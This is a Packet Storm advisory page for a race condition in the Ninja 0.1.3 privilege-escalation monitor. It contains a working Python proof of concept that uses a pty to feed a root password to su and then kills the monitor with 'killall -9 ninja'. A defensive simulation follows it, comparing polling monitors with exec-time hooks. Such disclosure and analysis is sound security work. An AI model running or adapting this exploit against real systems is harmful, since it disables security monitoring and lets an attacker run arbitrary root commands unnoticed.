Ninja 0.1.3 Race Condition

2015-04-29T00:00:00
ID PACKETSTORM:131686
Type packetstorm
Reporter Ben Sheppard
Modified 2015-04-29T00:00:00

Description

                                        
                                            `#[Title] Ninja privilege escalation detection and prevention system race condition  
#[Author] Ben 'highjack' Sheppard  
#[URL] http://highjack.github.io/  
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.  
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.  
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.  
#[Software Link] http://forkbomb.org/ninja/  
#[Date] 29/04/2015  
#[Version] 0.1.3  
#[Tested on] Kali Linux  
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg  
  
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court  
#https://www.youtube.com/watch?v=eA136fOsSeQ  
  
import pty, os, sys, subprocess  
pid, fd = pty.fork()  
  
#begin config  
user = "root"  
password = "mypassword" #change this :)  
command = "killall -9 ninja"  
#end config  
  
  
def usage():  
print """  
@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@   
@@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@   
@@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@   
!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!!   
@!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@!   
!!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!!   
!!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!!   
:!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:!   
:: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: :::   
: : : : :: :: : : : : : ::: : : : :: :: : : :::   
  
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition  
[Author] Ben 'highjack' Sheppard  
[URL] http://highjack.github.io/  
  
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.  
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.  
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.  
"""  
  
  
executions = 0  
def check_procs():  
p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)  
p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE)  
p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)  
output = p3.communicate()[0]  
if output != "":  
if executions != 0:  
sys.exit(0)  
return True  
else:  
return False  
  
def kill_ninja():  
if pid == 0:  
os.execvp("su", ["su", user, "-c", command])  
elif pid > 0:  
try:  
os.read(fd, 1024)  
os.write(fd, password + "\n")  
os.read(fd,1024)  
os.wait()  
os.close(fd)  
except:  
usage()  
print "[+] Ninja is terminated"  
sys.exit(0)  
  
  
while True:  
kill_ninja()  
if (check_procs == True):  
executions = executions + 1  
kill_ninja()  
  
`
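The advisory's core observation is that a monitor which periodically reads the process table can only react at its next scan, so anything that starts and finishes inside one scan interval is invisible to it. The simulation below, added here as an example and not part of the advisory or of the Ninja project, makes that window measurable: a polling monitor is compared with an exec-time event hook over a constructed process timeline, and `miss_probability` gives the chance that a short-lived root process is never sampled at all. The process names, uids and timings are constructed sample data, and `Proc`, `polling_monitor`, `exec_event_monitor` and `miss_probability` are this example's own names.

```python
# Added example (not part of the advisory or of the Ninja project): a simulation that
# contrasts the polling process-table monitor the advisory describes with an exec-time
# event hook. All process names, uids and timings below are constructed sample data.
from dataclasses import dataclass
from typing import Iterable, List, Set


@dataclass(frozen=True)
class Proc:
    cmd: str
    uid: int        # effective uid while the process runs (0 = root)
    start_ms: int   # time the process appears in the process table
    end_ms: int     # time it exits (exclusive)


def polling_monitor(procs: Iterable[Proc], interval_ms: int, horizon_ms: int,
                    phase_ms: int = 0) -> Set[str]:
    """Model of a `ps`-style scanner: sample the process table every interval_ms,
    starting at phase_ms, and report the root processes present at a sample instant.
    A process whose whole lifetime falls between two samples is never seen."""
    seen: Set[str] = set()
    for t in range(phase_ms, horizon_ms + 1, interval_ms):
        seen.update(p.cmd for p in procs if p.uid == 0 and p.start_ms <= t < p.end_ms)
    return seen


def exec_event_monitor(procs: Iterable[Proc]) -> Set[str]:
    """Model of a hook that fires on every exec (audit subsystem, LSM, eBPF tracepoint):
    it observes each root process exactly once, however briefly it lives."""
    return {p.cmd for p in procs if p.uid == 0}


def miss_probability(lifetime_ms: int, interval_ms: int) -> float:
    """Chance that a root process of the given lifetime, started at a uniformly random
    offset, is never sampled by a monitor polling every interval_ms."""
    if lifetime_ms >= interval_ms:
        return 0.0
    return 1.0 - lifetime_ms / interval_ms


# Constructed sample timeline: one long-lived root daemon, one root process that lives
# for 50 ms (far shorter than the 1000 ms scan interval), and one unprivileged process.
SAMPLE_PROCS: List[Proc] = [
    Proc("long-lived-root-daemon", 0, 0, 10_000),
    Proc("short-lived-root-shell", 0, 300, 350),
    Proc("user-editor", 1000, 0, 10_000),
]

if __name__ == "__main__":
    polled = polling_monitor(SAMPLE_PROCS, interval_ms=1000, horizon_ms=5000)
    hooked = exec_event_monitor(SAMPLE_PROCS)
    print("polling monitor saw:", sorted(polled))
    print("exec hook saw:      ", sorted(hooked))
    print("missed by polling:  ", sorted(hooked - polled))
    print("miss probability for a 50 ms process at a 1 s interval:",
          miss_probability(50, 1000))
```

Shortening the poll interval only shrinks the window; it never closes it, since any process shorter than the interval still has a non-zero chance of falling between two samples (try `phase_ms=320` to see the same 50 ms process caught purely by luck). Detection or prevention that has to hold against this class of race must sit on the event itself, for example an exec or authentication hook, or restricting who may invoke `su` in the first place, rather than on a scan that runs afterwards.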